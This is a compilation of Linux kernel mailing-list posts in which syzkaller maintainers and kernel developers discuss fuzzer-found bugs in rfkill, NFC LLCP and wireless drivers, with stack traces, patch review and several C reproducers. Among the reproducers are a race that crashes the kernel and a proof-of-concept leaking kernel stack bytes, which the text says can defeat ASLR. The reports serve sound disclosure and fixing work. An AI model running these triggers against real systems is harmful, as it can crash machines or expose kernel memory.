> &(0x7f007000)={&(0x7f1ca000)={0x14, 0x1c, 0x109,
> 0x, 0x, {0x4, 0x0, 0x0}, []}, 0x14},
> 0x1, 0x0, 0x0, 0x0}, 0x0)
>
> I've reformatted it as
>
> sendmsg$nl_generic(
> r1,
> &(0x7fb3e000-0x38)={
> addr=   &(0x7fd4a000-0xc)={
> 0x10, 0x0, 0x0, 0x0
> },
> addrlen=0xc,
> vec=&(0x7f007000)={
> ptr=&(0x7f1ca000)={
> 0x14, 0x1c, 0x109, 0x,
> 0x, {0x4, 0x0, 0x0}, []
> },
> len=0x14
> },
> vlen=   0x1,
> ctrl=   0x0,
> ctrllen=0x0,
> f=  0x0
> },
> 0x0
> )
>
> but am still getting lost - what exactly is the *byte* sequence inside
> the (full) message (including headers)?

Hi,

I think you decoded it correctly. The netlink message is:

{0x14, 0x1c, 0x109, 0x, 0x, {0x4, 0x0, 0x0}, []}

0x14 is the length, 0x1c is the type, and so on.

These numbers are input data for these descriptions:
https://github.com/google/syzkaller/blob/master/sys/linux/socket_netlink.txt
which generally match C structures as you expect.

However, there can be some surprising things: for example, executing
one ioctl/setsockopt with data meant for another one, or these
0x values actually meaning 0 (for involved reasons), or we
can simply have bugs in these descriptions, so that they don't match the C
structures and all the data ends up garbled or shifted.

If this representation does not make sense to you right away, your
best bet is to look at or run the C reproducer, where you can see the
true data layout:

  *(uint64_t*)0x20b3dfc8 = 0x20d49ff4;
  *(uint32_t*)0x20b3dfd0 = 0xc;
  *(uint64_t*)0x20b3dfd8 = 0x20007000;
  *(uint64_t*)0x20b3dfe0 = 1;
  *(uint64_t*)0x20b3dfe8 = 0;
  *(uint64_t*)0x20b3dff0 = 0;
  *(uint32_t*)0x20b3dff8 = 0;
  *(uint16_t*)0x20d49ff4 = 0x10;
  *(uint16_t*)0x20d49ff6 = 0;
  *(uint32_t*)0x20d49ff8 = 0;
  *(uint32_t*)0x20d49ffc = 0;
  *(uint64_t*)0x20007000 = 0x201ca000;
  *(uint64_t*)0x20007008 = 0x14;
  *(uint32_t*)0x201ca000 = 0x14;
  *(uint16_t*)0x201ca004 = 0x1c;
  *(uint16_t*)0x201ca006 = 0x109;
  *(uint32_t*)0x201ca008 = 0;
  *(uint32_t*)0x201ca00c = 0;
  *(uint8_t*)0x201ca010 = 4;
  *(uint8_t*)0x201ca011 = 0;
  *(uint16_t*)0x201ca012 = 0;
  syscall(__NR_sendmsg, r[1], 0x20b3dfc8, 0);


> Ah, then again, now I see the fault injection - I guess dev_set_name()
> just failed and we didn't check the return value, will fix that.

Yes, it's highly likely the root cause. The raw.log file shows that
there was an immediately preceding fault in kmalloc in the same
process, with a similar stack.


Re: WARNING in wiphy_register

2018-01-15 Thread Dmitry Vyukov
On Mon, Jan 15, 2018 at 9:22 AM, Johannes Berg
 wrote:
> Hi syzbot maintainers,
>
> Thanks for the report.
>
>>   hwsim_new_radio_nl+0x5b7/0x7c0 drivers/net/wireless/mac80211_hwsim.c:3152
>>   genl_family_rcv_msg+0x7b7/0xfb0 net/netlink/genetlink.c:599
>>   genl_rcv_msg+0xb2/0x140 net/netlink/genetlink.c:624
>
> You're getting into the kernel via generic netlink receive, so just as
> an FYI - the generic netlink numbers aren't stable across systems, so
> your reproducer has a quite good chance of not working without your
> kernel .config and (virt) hardware environment.

Hi Johannes,

Thanks for the feedback.
syzbot tests within a net namespace (which is free of eth0 and other
stuff) and sets up devices in that namespace. For bugs, it first
tries to reproduce them in that environment; if that succeeds, it
tries to simplify the reproducer by stripping the namespace/device setup
(which is quite verbose), and if that also succeeds, it provides this
simplified reproducer.
In this case it decided that the namespace setup is not important. The
.config is still important, but it is provided.

Are you able to reproduce the WARNING with the provided config? If
not, we can look into how to improve this.


> I'll take a look at this and the rfkill one, I assume that there are
> some sanity checks missing in hwsim generic netlink when it builds a
> radio struct.
>
> However, I can't really promise that I'll be able to validate the
> changes against your reproducer.
>
> johannes


Re: usb/net/rt2x00: warning in rt2800_eeprom_word_index

2017-10-19 Thread Dmitry Vyukov
On Mon, Oct 16, 2017 at 2:19 PM, Dmitry Vyukov <dvyu...@google.com> wrote:
> On Mon, Oct 16, 2017 at 11:40 AM, Stanislaw Gruszka <sgrus...@redhat.com> 
> wrote:
>> Hi Dmitry
>>
>> On Sat, Oct 14, 2017 at 04:38:03PM +0200, Dmitry Vyukov wrote:
>>> On Thu, Oct 12, 2017 at 9:25 AM, Stanislaw Gruszka <sgrus...@redhat.com> 
>>> wrote:
>>> > Hi
>>> >
>>> > On Mon, Oct 09, 2017 at 07:50:53PM +0200, Andrey Konovalov wrote:
>>> >> I've got the following report while fuzzing the kernel with syzkaller.
>>> >>
>>> >> On commit 8a5776a5f49812d29fe4b2d0a2d71675c3facf3f (4.14-rc4).
>>> >>
>>> >> I'm not sure whether this is a bug in the driver, or just a way to
>>> >> report misbehaving device. In the latter case this shouldn't be a
>>> >> WARN() call, since WARN() means bug in the kernel.
>>> >
>>> > This is about wrong EEPROM, which reported 3 tx streams on
>>> > non 3 antenna device. I think WARN() is justified and thanks
>>> > to the call trace I was actually able to to understand what
>>> > happened.
>>> >
>>> > In general I do not think WARN() only means a kernel bug, it
>>> > can be F/W or H/W bug too.
>>>
>>> Hi Stanislaw,
>>>
>>> Printing messages is fine. Printing stacks is fine. Just please make
>>> them distinguishable from kernel bugs and don't kill the whole
>>> possibility of automated Linux kernel testing. That's an important
>>> capability.
>>
>> We do not distinguish between bugs and other problems when WARN() is
>> used in (wireless) drivers, what I think is correct, taking comment from
>> include/asm-generic/bug.h :
>>
>> /*
>>  * WARN(), WARN_ON(), WARN_ON_ONCE, and so on can be used to report
>>  * significant issues that need prompt attention if they should ever
>>  * appear at runtime.  Use the versions with printk format strings
>>  * to provide better diagnostics.
>>  */
>>
>> Historically we have BUG() to mark the bugs, but usage if it is not
>> recommended as it can kill the system, so for anything that can
>> be recovered in runtime - WARN() is recommended.
>>
>> Perhaps we can introduce another helper like PROBLEM() for marking
>> situations when something is wrong, but it is not a bug. However I'm
>> not even sure at what extent it can be used, since for many cases
>> if not the most, driver author can not tell apriori if the problem
>> is a bug in the driver or HW/FW misbehaviour (or maybe particular
>> issue can happen because of both).
>
> I will write a separate email to LKML.


I sent a mail titled "Distinguishing kernel bugs from invalid inputs"
to LKML. Here is a copy:
https://groups.google.com/forum/#!topic/syzkaller/dGh7qtbu14Q


Re: usb/net/rt2x00: warning in rt2800_eeprom_word_index

2017-10-16 Thread Dmitry Vyukov
On Mon, Oct 16, 2017 at 12:27 PM, Kalle Valo <kv...@codeaurora.org> wrote:
> Dmitry Vyukov <dvyu...@google.com> writes:
>
>> On Thu, Oct 12, 2017 at 9:25 AM, Stanislaw Gruszka <sgrus...@redhat.com> 
>> wrote:
>>> Hi
>>>
>>> On Mon, Oct 09, 2017 at 07:50:53PM +0200, Andrey Konovalov wrote:
>>>> I've got the following report while fuzzing the kernel with syzkaller.
>>>>
>>>> On commit 8a5776a5f49812d29fe4b2d0a2d71675c3facf3f (4.14-rc4).
>>>>
>>>> I'm not sure whether this is a bug in the driver, or just a way to
>>>> report misbehaving device. In the latter case this shouldn't be a
>>>> WARN() call, since WARN() means bug in the kernel.
>>>
>>> This is about wrong EEPROM, which reported 3 tx streams on
>>> non 3 antenna device. I think WARN() is justified and thanks
>>> to the call trace I was actually able to to understand what
>>> happened.
>>>
>>> In general I do not think WARN() only means a kernel bug, it
>>> can be F/W or H/W bug too.
>>
>> Hi Stanislaw,
>>
>> Printing messages is fine. Printing stacks is fine. Just please make
>> them distinguishable from kernel bugs and don't kill the whole
>> possibility of automated Linux kernel testing. That's an important
>> capability.
>
> Not really following you. Are you saying that using WARN() prevents
> automated Linux kernel testing?


The problem is the absence of a way to tell when something is wrong
with the kernel itself (i.e. something kernel developers need to be
notified about).


Re: usb/net/rt2x00: warning in rt2800_eeprom_word_index

2017-10-16 Thread Dmitry Vyukov
On Mon, Oct 16, 2017 at 11:40 AM, Stanislaw Gruszka <sgrus...@redhat.com> wrote:
> Hi Dmitry
>
> On Sat, Oct 14, 2017 at 04:38:03PM +0200, Dmitry Vyukov wrote:
>> On Thu, Oct 12, 2017 at 9:25 AM, Stanislaw Gruszka <sgrus...@redhat.com> 
>> wrote:
>> > Hi
>> >
>> > On Mon, Oct 09, 2017 at 07:50:53PM +0200, Andrey Konovalov wrote:
>> >> I've got the following report while fuzzing the kernel with syzkaller.
>> >>
>> >> On commit 8a5776a5f49812d29fe4b2d0a2d71675c3facf3f (4.14-rc4).
>> >>
>> >> I'm not sure whether this is a bug in the driver, or just a way to
>> >> report misbehaving device. In the latter case this shouldn't be a
>> >> WARN() call, since WARN() means bug in the kernel.
>> >
>> > This is about wrong EEPROM, which reported 3 tx streams on
>> > non 3 antenna device. I think WARN() is justified and thanks
>> > to the call trace I was actually able to to understand what
>> > happened.
>> >
>> > In general I do not think WARN() only means a kernel bug, it
>> > can be F/W or H/W bug too.
>>
>> Hi Stanislaw,
>>
>> Printing messages is fine. Printing stacks is fine. Just please make
>> them distinguishable from kernel bugs and don't kill the whole
>> possibility of automated Linux kernel testing. That's an important
>> capability.
>
> We do not distinguish between bugs and other problems when WARN() is
> used in (wireless) drivers, what I think is correct, taking comment from
> include/asm-generic/bug.h :
>
> /*
>  * WARN(), WARN_ON(), WARN_ON_ONCE, and so on can be used to report
>  * significant issues that need prompt attention if they should ever
>  * appear at runtime.  Use the versions with printk format strings
>  * to provide better diagnostics.
>  */
>
> Historically we have BUG() to mark the bugs, but usage if it is not
> recommended as it can kill the system, so for anything that can
> be recovered in runtime - WARN() is recommended.
>
> Perhaps we can introduce another helper like PROBLEM() for marking
> situations when something is wrong, but it is not a bug. However I'm
> not even sure at what extent it can be used, since for many cases
> if not the most, driver author can not tell apriori if the problem
> is a bug in the driver or HW/FW misbehaviour (or maybe particular
> issue can happen because of both).

I will write a separate email to LKML.

Thanks


Re: usb/net/rt2x00: warning in rt2800_eeprom_word_index

2017-10-14 Thread Dmitry Vyukov
On Thu, Oct 12, 2017 at 9:25 AM, Stanislaw Gruszka  wrote:
> Hi
>
> On Mon, Oct 09, 2017 at 07:50:53PM +0200, Andrey Konovalov wrote:
>> I've got the following report while fuzzing the kernel with syzkaller.
>>
>> On commit 8a5776a5f49812d29fe4b2d0a2d71675c3facf3f (4.14-rc4).
>>
>> I'm not sure whether this is a bug in the driver, or just a way to
>> report misbehaving device. In the latter case this shouldn't be a
>> WARN() call, since WARN() means bug in the kernel.
>
> This is about wrong EEPROM, which reported 3 tx streams on
> non 3 antenna device. I think WARN() is justified and thanks
> to the call trace I was actually able to to understand what
> happened.
>
> In general I do not think WARN() only means a kernel bug, it
> can be F/W or H/W bug too.

Hi Stanislaw,

Printing messages is fine. Printing stacks is fine. Just please make
them distinguishable from kernel bugs and don't kill the whole
possibility of automated Linux kernel testing. That's an important
capability.

Thanks


net/rfkill: WARNING in rfkill_fop_read

2016-01-26 Thread Dmitry Vyukov
Hello,

The following program triggers a WARNING in rfkill_fop_read:

[ cut here ]
WARNING: CPU: 2 PID: 6975 at kernel/sched/core.c:7663
__might_sleep+0x138/0x1a0()
do not call blocking ops when !TASK_RUNNING; state=1 set at
[] prepare_to_wait_event+0x141/0x410
kernel/sched/wait.c:210
Modules linked in:
CPU: 2 PID: 6975 Comm: a.out Not tainted 4.5.0-rc1+ #283
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011
  88003369f908 8299a06d 88003369f978
 8800338e 864453c0 88003369f948 8134fcf9
 813c9cf8 ed00066d3f2b 864453c0 1def
Call Trace:
 [< inline >] __dump_stack lib/dump_stack.c:15
 [] dump_stack+0x6f/0xa2 lib/dump_stack.c:50
 [] warn_slowpath_common+0xd9/0x140 kernel/panic.c:482
 [] warn_slowpath_fmt+0xa9/0xd0 kernel/panic.c:494
 [] __might_sleep+0x138/0x1a0 kernel/sched/core.c:7658
 [] mutex_lock_nested+0x74/0xa50 kernel/locking/mutex.c:617
 [< inline >] rfkill_readable net/rfkill/core.c:1102
 [] rfkill_fop_read+0x23d/0x3e0 net/rfkill/core.c:1125
 [] do_loop_readv_writev+0x141/0x1e0 fs/read_write.c:719
 [] do_readv_writev+0x5f8/0x6e0 fs/read_write.c:849
 [] vfs_readv+0x83/0xb0 fs/read_write.c:873
 [< inline >] SYSC_readv fs/read_write.c:899
 [] SyS_readv+0x111/0x2b0 fs/read_write.c:891
 [] entry_SYSCALL_64_fastpath+0x16/0x7a
arch/x86/entry/entry_64.S:185
---[ end trace 8fc3336c73e4219c ]---


// autogenerated by syzkaller (http://github.com/google/syzkaller)
#include <fcntl.h>
#include <pthread.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

long r[8];

void* thr(void* arg)
{
  switch ((long)arg) {
  case 0:
    /* map the fixed data region at 0x20000000 used below */
    r[0] = syscall(SYS_mmap, 0x20000000ul, 0x50000ul, 0x3ul, 0x32ul,
                   0xfffffffffffffffful, 0x0ul);
    break;
  case 1:
    r[2] = open("/dev/rfkill", O_RDWR);
    break;
  case 2:
    /* two struct iovec entries at 0x20042fe0, then readv() on the rfkill fd */
    *(uint64_t*)0x20042fe0 = (uint64_t)0x20042ff9;
    *(uint64_t*)0x20042fe8 = (uint64_t)0x7;
    *(uint64_t*)0x20042ff0 = (uint64_t)0x20032fa1;
    *(uint64_t*)0x20042ff8 = (uint64_t)0xf4;
    r[7] = syscall(SYS_readv, r[2], 0x20042fe0ul, 0x2ul, 0, 0, 0);
    break;
  }
  return 0;
}

void worker()
{
  long i;
  pthread_t th[3];

  memset(r, -1, sizeof(r));
  for (i = 0; i < 3; i++) {
    pthread_create(&th[i], 0, thr, (void*)i);
    usleep(1);
  }
  for (i = 0; i < 3; i++) {
    pthread_create(&th[i], 0, thr, (void*)i);
    if (i % 2 == 0)
      usleep(1);
  }
  usleep(10);
}

int main()
{
  int i, status, pids[16];

  for (;;) {
    for (i = 0; i < 16; i++) {
      if ((pids[i] = fork()) == 0) {
        worker();
        exit(0);
      }
    }
    for (i = 0; i < 16; i++) {
      while (waitpid(pids[i], &status, __WALL) != pids[i]) {
      }
    }
  }
  return 0;
}

On commit 92e963f50fc74041b5e9e744c330dca48e04f08d (Jan 24).
--
To unsubscribe from this list: send the line "unsubscribe linux-wireless" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html


Re: [Patch net] nfc: check sock state in llcp_sock_getname()

2016-01-02 Thread Dmitry Vyukov
On Sat, Jan 2, 2016 at 1:34 AM, Cong Wang <xiyou.wangc...@gmail.com> wrote:
> llcp_sock_getname() checks llcp_sock->dev to make sure
> llcp_sock is already connected or bound, however, we could
> be in the middle of llcp_sock_bind() where llcp_sock->dev
> is bound and llcp_sock->service_name_len is set,
> but llcp_sock->service_name is not, in this case we would
> lead to copy some bytes from a NULL pointer.
>
> We should just check if sk->sk_state is still closed since
> both connect() and bind() will update this state at the end.

Hi Cong,

This is still racy. If you want to go lock-free, then you also need
proper memory barriers: stores to sk_state need to use
smp_store_release(), and the load needs to use smp_load_acquire().
Otherwise getname can still see a partially initialized socket.


> Reported-by: Dmitry Vyukov <dvyu...@google.com>
> Cc: Lauro Ramos Venancio <lauro.venan...@openbossa.org>
> Cc: Aloisio Almeida Jr <aloisio.alme...@openbossa.org>
> Cc: Samuel Ortiz <sa...@linux.intel.com>
> Signed-off-by: Cong Wang <xiyou.wangc...@gmail.com>
> ---
>  net/nfc/llcp_sock.c | 2 +-
>  1 file changed, 1 insertion(+), 1 deletion(-)
>
> diff --git a/net/nfc/llcp_sock.c b/net/nfc/llcp_sock.c
> index ecf0a01..5a91997 100644
> --- a/net/nfc/llcp_sock.c
> +++ b/net/nfc/llcp_sock.c
> @@ -500,7 +500,7 @@ static int llcp_sock_getname(struct socket *sock, struct 
> sockaddr *uaddr,
> struct nfc_llcp_sock *llcp_sock = nfc_llcp_sock(sk);
> DECLARE_SOCKADDR(struct sockaddr_nfc_llcp *, llcp_addr, uaddr);
>
> -   if (llcp_sock == NULL || llcp_sock->dev == NULL)
> +   if (llcp_sock == NULL || sk->sk_state == LLCP_CLOSED)
> return -EBADFD;
>
> pr_debug("%p %d %d %d\n", sk, llcp_sock->target_idx,
> --
> 1.8.3.1
>


net/nfc: GPF in llcp_sock_getname

2016-01-01 Thread Dmitry Vyukov
Hello,

The following program triggers a GPF in llcp_sock_getname:

// autogenerated by syzkaller (http://github.com/google/syzkaller)
#include <sys/socket.h>
#include <sys/types.h>
#include <linux/nfc.h>
#include <pthread.h>

int fd;

/* Thread: bind() the socket while main() calls getsockname() on it. */
void *thr(void *arg)
{
	struct sockaddr_nfc_llcp sa;
	sa.sa_family = AF_NFC;
	sa.dev_idx = 0;
	sa.target_idx = 0x24a8;
	sa.nfc_protocol = 0;
	sa.dsap = 0;
	sa.ssap = 2;
	sa.service_name[0] = 7;
	sa.service_name[1] = 9;
	sa.service_name[2] = 3;
	sa.service_name_len = 3;
	bind(fd, (struct sockaddr*)&sa, sizeof(sa));
	return 0;
}

int main()
{
	fd = socket(AF_NFC, 0x2ul, 0x1ul);	/* SOCK_DGRAM, NFC_SOCKPROTO_LLCP */
	pthread_t th;
	pthread_create(&th, 0, thr, 0);
	/* races with bind() in thr() */
	struct sockaddr_nfc_llcp sa;
	socklen_t len = sizeof(sa);
	getsockname(fd, (struct sockaddr*)&sa, &len);
	return 0;
}


kasan: GPF could be caused by NULL-ptr deref or user memory access
general protection fault:  [#51] SMP KASAN
Modules linked in:
CPU: 2 PID: 4207 Comm: a.out Not tainted 4.4.0-rc7+ #184
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011
task: 8800683e9780 ti: 880064c7 task.ti: 880064c7
RIP: 0010:[]  []
kasan_report_error+0x1b/0x560
RSP: 0018:880064c77c90  EFLAGS: 00010286
RAX: dc00 RBX: 0003 RCX: dc00
RDX:  RSI: 0003 RDI: 880064c77c98
RBP: 880064c77cc0 R08: ed000c98efd6 R09: 880064c77e58
R10: 8800639670a0 R11: 880063967098 R12: 880064c77e6a
R13:  R14:  R15: 880063967088
FS:  018ca880(0063) GS:88006da0() knlGS:
CS:  0010 DS:  ES:  CR0: 8005003b
CR2: 00c8200012e0 CR3: 64c59000 CR4: 06e0
Stack:
 816d25d4  0018 0003
 00034000 816d17ed 880064c77cd0 816d1264
 880064c77cf8 816d17ed  880064c77e58
Call Trace:
 [< inline >] check_memory_region mm/kasan/kasan.c:264
 [] __asan_loadN+0x124/0x1a0 mm/kasan/kasan.c:512
 [] memcpy+0x1d/0x40 mm/kasan/kasan.c:297
 [] llcp_sock_getname+0x424/0x600 net/nfc/llcp_sock.c:519
 [] SYSC_getsockname+0x1bd/0x220 net/socket.c:1570
 [] SyS_getsockname+0x24/0x30 net/socket.c:1555
 [] entry_SYSCALL_64_fastpath+0x16/0x7a
arch/x86/entry/entry_64.S:185
Code: 48 01 c7 e8 38 2b fc ff 5d c3 66 0f 1f 44 00 00 48 8b 17 48 b9
00 00 00 00 00 fc ff df 48 8b 77 10 48 89 d0 48 c1 e8 03 48 01 c8 <80>
38 00 75 1d 48 01 d6 eb 13 48 83 c2 08 48 89 d0 48 c1 e8 03
RIP  [] kasan_report_error+0x1b/0x560 mm/kasan/report.c:214
 RSP 
---[ end trace b0c68fb0d02b9447 ]---

On commit 8513342170278468bac126640a5d2d12ffbff106 (Dec 28).
The GPF seems to be caused by a data race on the socket state.


net/nfc: user-controllable kmalloc size in nfc_llcp_send_ui_frame

2015-12-30 Thread Dmitry Vyukov
Hello,

The following program triggers a WARNING in kmalloc:


[ cut here ]
WARNING: CPU: 2 PID: 6754 at mm/page_alloc.c:2989
__alloc_pages_nodemask+0x771/0x15f0()
Modules linked in:
CPU: 2 PID: 6754 Comm: a.out Not tainted 4.4.0-rc7+ #181
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011
  88006275f5e0 8289d9dd 
 8800621c8000 85dbab40 88006275f620 812ebbb9
 815fc6b1 85dbab40 0bad 88006275f8a8
Call Trace:
 [< inline >] __dump_stack lib/dump_stack.c:15
 [] dump_stack+0x6f/0xa2 lib/dump_stack.c:50
 [] warn_slowpath_common+0xd9/0x140 kernel/panic.c:460
 [] warn_slowpath_null+0x29/0x30 kernel/panic.c:493
 [< inline >] __alloc_pages_slowpath mm/page_alloc.c:2989
 [] __alloc_pages_nodemask+0x771/0x15f0 mm/page_alloc.c:3235
 [] alloc_pages_current+0xee/0x340 mm/mempolicy.c:2055
 [< inline >] alloc_pages include/linux/gfp.h:451
 [] alloc_kmem_pages+0x16/0xf0 mm/page_alloc.c:3414
 [] kmalloc_order+0x1f/0x80 mm/slab_common.c:1007
 [] kmalloc_order_trace+0x1f/0x140 mm/slab_common.c:1018
 [< inline >] kmalloc_large include/linux/slab.h:390
 [] __kmalloc+0x2de/0x330 mm/slub.c:3555
 [< inline >] kmalloc include/linux/slab.h:463
 [< inline >] kzalloc include/linux/slab.h:602
 [] nfc_llcp_send_ui_frame+0xdc/0x3d0
net/nfc/llcp_commands.c:732
 [] llcp_sock_sendmsg+0x250/0x310 net/nfc/llcp_sock.c:782
 [< inline >] sock_sendmsg_nosec net/socket.c:610
 [] sock_sendmsg+0xca/0x110 net/socket.c:620
 [] ___sys_sendmsg+0x72a/0x840 net/socket.c:1946
 [] __sys_sendmsg+0xce/0x170 net/socket.c:1980
 [< inline >] SYSC_sendmsg net/socket.c:1991
 [] SyS_sendmsg+0x2d/0x50 net/socket.c:1987
 [] entry_SYSCALL_64_fastpath+0x16/0x7a
arch/x86/entry/entry_64.S:185
---[ end trace 62962d1ed2b9f41a ]---


// autogenerated by syzkaller (http://github.com/google/syzkaller)
#include <stdint.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

long r[68];

int main()
{
memset(r, -1, sizeof(r));
r[0] = syscall(SYS_mmap, 0x20000000ul, 0x20000ul, 0x3ul,
0x32ul, 0xfffffffffffffffful, 0x0ul);
r[1] = syscall(SYS_socket, 0x27ul, 0x2ul, 0x1ul, 0, 0, 0);
*(uint16_t*)0x2000cfa0 = (uint16_t)0x27;
*(uint32_t*)0x2000cfa4 = (uint32_t)0x1;
*(uint32_t*)0x2000cfa8 = (uint32_t)0x8;
*(uint32_t*)0x2000cfac = (uint32_t)0x7;
*(uint8_t*)0x2000cfb0 = (uint8_t)0x0;
*(uint8_t*)0x2000cfb1 = (uint8_t)0x38;
*(uint8_t*)0x2000cfb2 = (uint8_t)0x6;
*(uint8_t*)0x2000cfb3 = (uint8_t)0x0;
*(uint32_t*)0x2000cfb4 = (uint32_t)0x9;
*(uint32_t*)0x2000cfb8 = (uint32_t)0x7;
*(uint32_t*)0x2000cfbc = (uint32_t)0x9;
*(uint32_t*)0x2000cfc0 = (uint32_t)0xfff7;
*(uint32_t*)0x2000cfc4 = (uint32_t)0x8;
*(uint32_t*)0x2000cfc8 = (uint32_t)0xcf77;
*(uint32_t*)0x2000cfcc = (uint32_t)0x39;
*(uint32_t*)0x2000cfd0 = (uint32_t)0x6;
*(uint32_t*)0x2000cfd4 = (uint32_t)0x8;
*(uint32_t*)0x2000cfd8 = (uint32_t)0x4;
*(uint32_t*)0x2000cfdc = (uint32_t)0x4b;
*(uint32_t*)0x2000cfe0 = (uint32_t)0x9;
*(uint32_t*)0x2000cfe4 = (uint32_t)0x5;
*(uint32_t*)0x2000cfe8 = (uint32_t)0x4;
*(uint32_t*)0x2000cfec = (uint32_t)0x7;
*(uint8_t*)0x2000cff0 = (uint8_t)0xfffd;
*(uint64_t*)0x2000cff8 = (uint64_t)0x8;
r[27] = syscall(SYS_bind, r[1], 0x2000cfa0ul, 0x60ul, 0, 0, 0);
*(uint64_t*)0x20014fc8 = (uint64_t)0x20014000;
*(uint32_t*)0x20014fd0 = (uint32_t)0x60;
*(uint64_t*)0x20014fd8 = (uint64_t)0x20014000;
*(uint64_t*)0x20014fe0 = (uint64_t)0x1;
*(uint64_t*)0x20014fe8 = (uint64_t)0x20014000;
*(uint64_t*)0x20014ff0 = (uint64_t)0x11;
*(uint32_t*)0x20014ff8 = (uint32_t)0x0;
*(uint16_t*)0x20014000 = (uint16_t)0x27;
*(uint32_t*)0x20014004 = (uint32_t)0x3;
*(uint32_t*)0x20014008 = (uint32_t)0x0;
*(uint32_t*)0x2001400c = (uint32_t)0x0;
*(uint8_t*)0x20014010 = (uint8_t)0x2;
*(uint8_t*)0x20014011 = (uint8_t)0x52;
*(uint8_t*)0x20014012 = (uint8_t)0x7;
*(uint8_t*)0x20014013 = (uint8_t)0x2;
*(uint32_t*)0x20014014 = (uint32_t)0x3;
*(uint32_t*)0x20014018 = (uint32_t)0x8;
*(uint32_t*)0x2001401c = (uint32_t)0x9;
*(uint32_t*)0x20014020 = (uint32_t)0xde4;
*(uint32_t*)0x20014024 = (uint32_t)0x8;
*(uint32_t*)0x20014028 = (uint32_t)0x6;
*(uint32_t*)0x2001402c = (uint32_t)0x6850;
*(uint32_t*)0x20014030 = (uint32_t)0x24;
*(uint32_t*)0x20014034 = (uint32_t)0x0;
*(uint32_t*)0x20014038 = (uint32_t)0xffe4;
*(uint32_t*)0x2001403c = (uint32_t)0x6;
*(uint32_t*)0x20014040 = (uint32_t)0x4e;
*(uint32_t*)0x20014044 = (uint32_t)0x6;
*(uint32_t*)0x20014048 = (uint32_t)0xf14c;

Information leak in llcp_sock_bind/llcp_raw_sock_bind

2015-12-15 Thread Dmitry Vyukov
Hello,

The following program leaks uninitialized bytes from the kernel stack:

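#include <fcntl.h>
#include <sched.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

#define NFC_SOCKPROTO_LLCP 1

int main(void)
{
	/* sockaddr_storage is large enough for whatever length
	 * getsockname() reports, so the hex dump stays in bounds. */
	struct sockaddr_storage sa;
	socklen_t len;
	unsigned i, try;
	int fd;

	for (try = 0; try < 3; try++) {
		fd = socket(AF_NFC, 3, NFC_SOCKPROTO_LLCP);	/* 3 == SOCK_RAW */
		if (fd == -1)
			return 1;
		/* vary what ran on the kernel stack just before bind() */
		switch (try) {
		case 0:
			break;
		case 1:
			sched_yield();
			break;
		case 2:
			open("/dev/null", O_RDONLY);
		}
		memset(&sa, 0, sizeof(sa));
		sa.ss_family = AF_NFC;
		/* pass only the 2-byte address family */
		bind(fd, (struct sockaddr *)&sa, 2);
		len = sizeof(sa);
		getsockname(fd, (struct sockaddr *)&sa, &len);
		for (i = 0; i < len && i < sizeof(sa); i++)
			printf("%02x", ((unsigned char *)&sa)[i]);
		printf("\n");
	}
	return 0;
}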

Output:
2700b002401f4511e5e38f90b002400018006c007c13410028f77610fe7f5e104000
2700b002400212046c164769b002400018006c007c134100c874fff4fe7f5e104000
2700b002408e8a91e4e069fcb002400018006c007c134100f868b3f2fe7f5e104000

The problem is that llcp_sock_bind/llcp_raw_sock_bind do not check the
sockaddr_len passed in, so they copy garbage from the stack into the
socket and then return it via getsockname.
This can defeat ASLR, leak crypto keys, etc.


Re: Information leak in llcp_sock_bind/llcp_raw_sock_bind

2015-12-15 Thread Dmitry Vyukov
On Tue, Dec 15, 2015 at 9:36 PM, David Miller <da...@davemloft.net> wrote:
> From: Dmitry Vyukov <dvyu...@google.com>
> Date: Tue, 15 Dec 2015 21:00:20 +0100
>
>> The problem is that llcp_sock_bind/llcp_raw_sock_bind do not check
>> sockaddr_len passed in, so they copy stack garbage from stack into the
>> socket and then return it in getsockname.
>> This can defeat ASLR, leak crypto keys, etc.
>
> That's actually the first thing these functions do.
>
> They completely clear out the on-stack llcp_addr, then they copy only
> as much as the user gave them, being careful not to use more than
> sizeof(llcp_addr).
>
> memset(_addr, 0, sizeof(llcp_addr));
> len = min_t(unsigned int, sizeof(llcp_addr), alen);
> memcpy(_addr, addr, len);
>
> I don't see what the problem is, you'll need to be more specific.

You are right. Sorry.

There still seems to be a minor leak here:

  if (!addr || addr->sa_family != AF_NFC)
  return -EINVAL;

addr->sa_family can be uninitialized if the caller passes an alen too
short to cover it.


Re: Information leak in llcp_sock_bind/llcp_raw_sock_bind

2015-12-15 Thread Dmitry Vyukov
On Tue, Dec 15, 2015 at 9:48 PM, David Miller <da...@davemloft.net> wrote:
> From: Dmitry Vyukov <dvyu...@google.com>
> Date: Tue, 15 Dec 2015 21:45:16 +0100
>
>> On Tue, Dec 15, 2015 at 9:36 PM, David Miller <da...@davemloft.net> wrote:
>>> From: Dmitry Vyukov <dvyu...@google.com>
>>> Date: Tue, 15 Dec 2015 21:00:20 +0100
>>>
>>>> The problem is that llcp_sock_bind/llcp_raw_sock_bind do not check
>>>> sockaddr_len passed in, so they copy stack garbage from stack into the
>>>> socket and then return it in getsockname.
>>>> This can defeat ASLR, leak crypto keys, etc.
>>>
>>> That's actually the first thing these functions do.
>>>
>>> They completely clear out the on-stack llcp_addr, then they copy only
>>> as much as the user gave them, being careful not to use more than
>>> sizeof(llcp_addr).
>>>
>>> memset(_addr, 0, sizeof(llcp_addr));
>>> len = min_t(unsigned int, sizeof(llcp_addr), alen);
>>> memcpy(_addr, addr, len);
>>>
>>> I don't see what the problem is, you'll need to be more specific.
>>
>> You are right. Sorry.
>>
>> There still seems to be a minor leak here:
>>
>>   if (!addr || addr->sa_family != AF_NFC)
>>   return -EINVAL;
>>
>> addr->sa_family can be uninit.
>
> That shouldn't matter at all, that can't cause socket state corruption.
>
> I want to ask you if you are actually seeing kernel stack in that hexdump
> you are posting?  If so, how do you actually account for it?  Nothing you
> have shown so far make that clear.

I've seen a kernel address leaked at least in pptp_bind: it was a
return PC from the SyS_socket call that was executed just before bind.
The exact contents of the leaked data depend on the kernel config, the
